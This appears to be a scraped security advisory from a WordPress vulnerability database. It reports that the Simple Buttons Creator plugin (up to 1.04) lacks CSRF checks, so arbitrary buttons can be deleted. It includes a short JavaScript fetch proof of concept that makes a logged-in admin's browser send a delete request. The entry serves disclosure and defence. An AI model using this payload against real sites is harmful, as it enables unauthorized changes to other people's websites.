Lucene search

K
wpvulndbBob MatyasWPVDB-ID:43297210-17A6-4B51-B8CA-32CEEF9FC09A
HistoryMar 25, 2024 - 12:00 a.m.

Simple Buttons Creator <= 1.04 - Aribtrary Button Deletion via CSRF

2024-03-2500:00:00
Bob Matyas
wpscan.com
6
csrf
arbitrary
deletion
security
plugin

AI Score

9.4

Confidence

High

EPSS

0

Percentile

9.0%

Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

PoC

Make a logged in admin open a page with the code below (where &lt;&gt; is an existing button): fetch("https://example.com/wp-admin/admin.php?page=simple-buttons", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'method=delete&amp;id;=&lt;&gt;', "credentials": "include" }).then(response =&gt; response.text()) .then(data =&gt; console.log(data));

AI Score

9.4

Confidence

High

EPSS

0

Percentile

9.0%

Related for WPVDB-ID:43297210-17A6-4B51-B8CA-32CEEF9FC09A